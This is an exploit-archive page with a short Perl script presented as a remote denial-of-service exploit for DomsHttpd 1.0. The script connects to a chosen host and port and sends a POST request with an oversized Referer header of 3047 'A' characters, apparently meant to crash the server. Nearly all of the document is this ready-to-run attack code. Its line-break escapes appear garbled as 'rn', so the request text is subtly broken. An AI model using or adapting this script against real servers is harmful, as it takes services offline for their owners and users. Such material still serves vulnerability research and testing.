[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DomsHttpd <= 1.0 Remote Denial Of Service Exploit
# Published : 2012-07-16
# Author :
# Previous Title : Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability
# Next Title : PHP 6.0 openssl_verify() Local Buffer Overflow PoC
#!/usr/bin/perl
# DomsHttpd 1.0 <= Remote Denial Of Service Exploit
# Credit: Jean Pascal Pereira <pereira@secbiz.de>
# Usage: domshttpd.pl [host] [port]
use strict;
use warnings;
use IO::Socket;
my $host = shift || "localhost";
my $port = shift || 88;
my $sock = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port
);
my $junk = "A"x3047;
print $sock "POST / HTTP/1.1rnHost: ".$host."rnConnection: closernUser-Agent: MozillarnReferer: http://".$host."/".$junk."rnrn";
sleep 4;
close($sock);